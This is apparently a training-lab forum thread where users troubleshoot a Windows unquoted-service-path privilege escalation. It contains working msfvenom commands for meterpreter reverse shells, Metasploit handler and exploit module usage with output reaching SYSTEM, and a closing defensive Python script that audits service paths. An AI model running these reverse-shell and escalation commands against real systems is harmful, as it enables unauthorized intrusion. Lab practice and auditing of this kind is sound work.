Lab 16 - Privilege Escalation via Services - issue on reverse shell back connection

Hi all,

I performed this lab until the end and I checked my solution with the proposed one but, when I reboot the victim machine, I do not get any reverse shell.
I also tried to manually execute the meterpreter payload called openvpnserv.exe that I inserted at C:\Program Files\OpenVPN\bin and I actually got a reverse meterpreter shell, but when I try to reboot the victim machine to get that executable run by the Service OpenVPNService at startup time, the reverse shell does not appear. I checked and, after the reboot, the OpenVPNService is in a “Stopped” state, even though it should automatically start, as stated by the solution and by the evidence I collected, since it is in start=auto mode. I also tried the #3 alternative of the solution by adding the payload to the original openvpnserv.exe file but it didn’t work.

Has anyone experienced the same issue? Can someone help me find the reasons for the failure?

Thank you very much.

If it is set to start automatically, does it work when you revert your changes to it, and what does the event log tell you about that service?
For me that did not work:

cd "C:\Program Files\OpenVPN\bin"
download openvpnserv.exe
cp openvpnserv.exe openvpnserv.exe.bak # target
cp openvpnserv.exe openvpnserv.exe.bak # attacker machine
msfvenom -p windows/meterpreter/reverse_tcp  LHOST=172.50.50.100 LPORT=6666  -o openvpnserv.exe -x openvpnserv.exe.bak -k -f exe
upload openvpnserv.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 6666
set lhost tap0
run -j

sessions -1 -C reboot -f 2

That worked though:

use exploit/windows/local/unquoted_service_path
set session 1
set lhost tap0
run
[*] Started reverse TCP handler on 172.50.50.100:4444
[*] Finding a vulnerable service...
[*] Attempting exploitation of OpenVPNService
[*] Placing C:\Program.exe for OpenVPNService
[*] Attempting to write 15872 bytes to C:\Program.exe...
[+] Manual cleanup of C:\Program.exe is required due to a potential reboot for exploitation.
[+] Successfully wrote payload
[*] Launching service OpenVPNService...
[*] Manual cleanup of the payload file is required. OpenVPNService will fail to start as long as the payload remains on disk.
[-] Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!
[*] Exploit completed, but no session was created.

sessions -1 -C reboot -f 2


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set lhost tap0
run -j
getuid
Server username: NT AUTHORITY\SYSTEM

Hi,

thank you for the precious time you dedicated to answering me. Anyway, just to mention, I did not generate my meterpreter payload with the payload you provided but I used the classic: msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=6000 -f exe -a x86 --platform Windows --o openvpnserv.exe. Then I positioned such file at C:\Program Files\OpenVPN\bin. As a matter of fact, it should work both when put inside the aforementioned directory and the C:\ directory (after changing the filename to Program.exe), due to the presence of Unquoted Service Path misconfiguration.
Anyway, tonight I tried again to exercise on this lab and the same procedure I followed yesterday worked! Therefore, I conclude that the ones of yesterday were issues related to INE.com (yesterday I also tried to reset the lab many times but it did not solve the problem).

Thank you anyway.
Cheers,
Ema

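For the defensive side of the Unquoted Service Path misconfiguration this thread revolves around, here is an added example (not part of any post or of the lab solution) that audits service ImagePath values and lists the earlier paths Windows would try before the real binary, which are the locations that must not be writable by non-administrators. Apart from the OpenVPNService path quoted in the thread, the service names and paths are constructed sample data, and treating the first `.exe` followed by whitespace as the end of the executable is an assumption of this sketch.

```python
import re

# Constructed sample data: service name -> ImagePath, as stored under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>. Only the OpenVPNService
# path comes from the thread; the other entries are made up for illustration.
SAMPLE_SERVICES = {
    "OpenVPNService": r"C:\Program Files\OpenVPN\bin\openvpnserv.exe",
    "QuotedSvc": r'"C:\Program Files\Vendor App\svc.exe" --run',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "ArgsSvc": r"C:\Tools\agent.exe /config C:\My Data\a.ini",
    "DeepSvc": r"C:\Program Files\Vendor App\svc.exe -service",
}

# Heuristic (assumption): the executable ends at the first ".exe" that is
# followed by whitespace or the end of the string.
_EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)


def executable_part(image_path):
    """Return the executable portion of an unquoted ImagePath, None if quoted."""
    path = image_path.strip()
    if path.startswith('"'):
        return None  # quoted paths are parsed unambiguously
    match = _EXE_END.search(path)
    return path[:match.end()] if match else path


def preceding_candidates(image_path):
    """Paths Windows tries, in order, before reaching the intended binary.

    For an unquoted path, process creation splits at each space and tries
    the prefix with ".exe" appended, so every space inside the executable
    path yields one earlier candidate.
    """
    exe = executable_part(image_path)
    if exe is None or " " not in exe:
        return []
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit(services):
    """Map each affected service name to the candidate paths to lock down."""
    return {name: cands for name, path in services.items()
            if (cands := preceding_candidates(path))}


if __name__ == "__main__":
    for name, cands in audit(SAMPLE_SERVICES).items():
        print(f"{name}: quote the ImagePath; check ACLs on {cands}")
```

The fix for every service it flags is to wrap the executable path in double quotes in the service configuration and to confirm that the parent directories of the listed candidates are not writable by unprivileged users.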